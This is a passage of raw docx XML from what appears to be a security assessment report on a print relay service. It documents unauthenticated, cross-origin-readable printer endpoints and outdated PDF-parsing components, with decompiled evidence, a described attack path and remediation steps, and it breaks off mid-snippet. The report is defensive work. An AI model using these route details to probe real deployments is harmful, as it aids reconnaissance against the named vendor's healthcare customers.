      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFCCCC"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>GET /printers -&gt; GetPrinterNames   // no auth, readable cross-origin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D437380" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Full Code Snippet (IL-reconstructed):  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB2D8C8" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>// Unauthenticated GET endpoints (decompiled route templates and actions)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>GET  /printers                         -&gt; GetPrinterNames</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>GET  /printers/detail                  -&gt; GetPrintersDetail</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>GET  /printers/status                  -&gt; GetPrintersStatus / GetPrinterStatus</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>GET  /printers/print-doc-type-maps     -&gt; GetPrintDocTypeMaps</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>GET  /ping                             -&gt; Ping</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>// VULNERABLE: none of these actions carry [Authorize], and the permissive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>// CORS policy (see F4) makes the responses readable cross-origin.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>// Printer status object exposes: IsOffline, IsInError, IsOutO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>fPaper,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>// IsPaperJammed, HasPaperProblem, NumberOfJobs, ShareName, fullName,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>// ... (30+ fields) that leak site/department/host naming conventions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B333DFB" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="009F2D8A"/>
    <w:p w14:paraId="77DDB167" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Unauthenticated GET endpoints observed (decompiled route templates and actions):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EEBB9ED" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="009C1336">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0448762B" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>GET  /printers                         -&gt; GetPrinterNames</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AEA0485" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>GET  /printers/detail                  -&gt; GetPrintersDetail</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBC454C" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>GET  /printers/status                  -&gt; GetPrintersStatus / GetPrinterStatus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BB4C81" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>GET  /printers/print-doc-type-maps     -&gt; GetPrintDocTypeMaps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3772A6D0" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>GET  /ping                             -&gt; Ping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44764B02" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>// Printer status object exposes: IsOffline, IsInError, IsOutOfPaper, IsPaperJammed,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09287694" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>// HasPaperProblem, NumberOfJobs, ShareName, fullName, ... (30+ fields)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7059BFFD" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="009C1336">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E273DE7" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>Attack Path (Executive View)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027E9D77" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C963246" wp14:editId="0913A098">
            <wp:extent cx="5943600" cy="39984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exec.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3998422"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6B89D7" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Figure M6 — Attack path: unauthenticated "read" endpoints hand an attacker the full printer list and detailed status, fueling reconnaissance for other findings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E93CC03" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="009F2D8A"/>
    <w:p w14:paraId="57063D78" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>REMEDIATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25710F25" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="505050"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Goal: stop unauthenticated reconnaissance by protecting the read endpoints and trimming what they expose.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5EBD27" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Step 1. Authenticate the read endpoints too</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368B82A5" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:pStyle w:val="ListBullet2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The controller-wide [Authorize] from Finding 3 already covers these; confirm GetPrinterNames, GetPrintersDetail, GetPrintersStatus, GetPrintDocTypeMaps and Ping all require a valid token (Ping may stay anonymous if it returns no data).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211FC8FD" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Step 2. Return only the fields the web app needs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6E4B9B" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:pStyle w:val="ListBullet2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Project the printer objects to a minimal DTO; drop share names, host names, and internal identifiers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31574DE7" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>return printers.Select(p =&gt; new PrinterDto {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    DisplayName = p.FriendlyName,   // no ShareName, no host/UNC paths</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    IsOnline    = !p.IsOffline</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D547387" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Step 3. Restrict origins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE0EF5D" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:pStyle w:val="ListBullet2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Apply the CORS allowlist from Finding 4 so responses are not readable by arbitrary sites.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4B9D39" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Step 4. Avoid sensitive detail in printer names</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DB76C3" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:pStyle w:val="ListBullet2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Where possible, rename queues so they do not encode site/department/host (e.g. avoid "PHARMACY-01-HOSTNAME").</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7867F5C5" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E9F7EF"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">✔ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Verify: (1) GET /printers without a token returns 401; (2) the returned JSON no longer contains share names or host identifiers; (3) an unlisted website cannot read the response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474C8C17" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="009F2D8A"/>
    <w:p w14:paraId="5EA71C34" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>REFERENCES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF1EC87" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>CWE-200: Exposure of Sensitive Information to an Unauthorized Actor — cwe.mitre.org/data/definitions/200.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0BD7A1" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>CWE-306: Missing Authentication for Critical Function — cwe.mitre.org/data/definitions/306.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305BF423" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>OWASP Top 10 2021 A01: Broken Access Control — owasp.org/Top10/A01_2021-Broken_Access_Control/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B1A27A" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="009C1336">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29F0EA51" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A924CED" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="202C6CE4" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03E5EAE5" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D759FA8" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43C6E2AC" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FD363D3" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E5E332B"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6441D3CF" w14:textId="77777777" w:rsidTr="002E6C25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7200" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03B31244" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
            <w:pPr>
              <w:pStyle w:val="Heading2"/>
              <w:ind w:left="0"/>
            </w:pPr>
            <w:bookmarkStart w:id="16" w:name="_Toc9000006"/>
            <w:bookmarkStart w:id="17" w:name="_Toc232079916"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>7. End-of-Life and Outdated Components Processing Untrusted Input - Medium</w:t>
            </w:r>
            <w:bookmarkEnd w:id="16"/>
            <w:bookmarkEnd w:id="17"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EC7D31"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="07D07C6B"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Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4C679C37" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE0D906"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Medium</w:t>
      </w:r>
      <w:r w:rsidRPr="00711F1D">
        <w:rPr>
          <w:b/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">  |  CVSS 3.1: 6.2 (</w:t>
      </w:r>
      <w:r w:rsidRPr="00711F1D">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:H</w:t>
      </w:r>
      <w:r w:rsidRPr="00711F1D">
        <w:rPr>
          <w:b/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F29C5C" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Affected components: </w:t>
      </w:r>
      <w:r>
        <w:t>ASP.NET Core 2.2 runtime, Aspose.PDF 20.10, Newtonsoft.Json 11.0.2, hosted on .NET Framework 4.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776565D0" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The host ships and runs ASP.NET Core 2.2, which reached end of support in December 2019 and therefore receives no security patches. More significantly, fully attacker-controlled PDF bytes are parsed in-process by Aspose.PDF 20.10 (released October 2020) via PdfViewer.BindPdf, with no isolation or size limiting. Feeding untrusted input to a large, dated document-parsing engine exposes the workstation to memory-safety and availability risks (crash/denial of service, and potential code execution within the parser). Newtonsoft.Json 11.0.2 is likewise several years out of date.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FFC817" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>This finding is a function of the runtime and dependency posture rather than a single code path; it compounds the impact of the printing findings because the same untrusted PDF that an attacker can submit unauthenticated is handed directly to the outdated parser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AABC0A4" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>EVIDENCE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0A4CD0" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>Code Source Tracking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68319D81" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Binary File:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>DesktopPrintRelayService.Host.exe (v1.0.0.5) + bundled dependency assemblies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527444D0" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">File Location:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>C:\Program Files (x86)\Inovalon\DesktopPrintRelayInstaller\  (assemblies alongside host .exe)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5180CF6E" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Namespace:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ScriptMed.DesktopPrintRelayService (host) + third-party assemblies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A29011" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Class:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ASP.NET Core 2.2 runtime / Aspose.PDF / Newtonsoft.Json (dependency posture)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587DC599" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Method:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>PdfPrinting.PrintPdf() processes untrusted Base64 PDF via Aspose.PDF 20.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C126E39" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerable Variable/String:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Kestrel 2.2.0.18316 (EOL), Aspose.PDF 20.10.0.0 (2020), Newtonsoft.Json 11.0.2, .NET Framework 4.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1B7346" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Source (where it comes from):  </w:t>
      </w:r>
      <w:r>
        <w:t>Component versions extracted from the installer payload (MSI File table / assembly versions)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2213EE" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerable Code Pattern:  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78636095" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFCCCC"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>bytes = Convert.FromBase64String(base64);  // fed to Aspose.PDF 20.10 (2020 build)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177D2D24" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Full Code Snippet (IL-reconstructed):  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38397F0B" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>// Component versions extracted from the installer payload (MSI File table)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>Microsoft.AspNetCore.Server.Kestrel.Core.dll   2.2.0.18316   (ASP.NET Core 2.2 - EOL Dec 2019)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
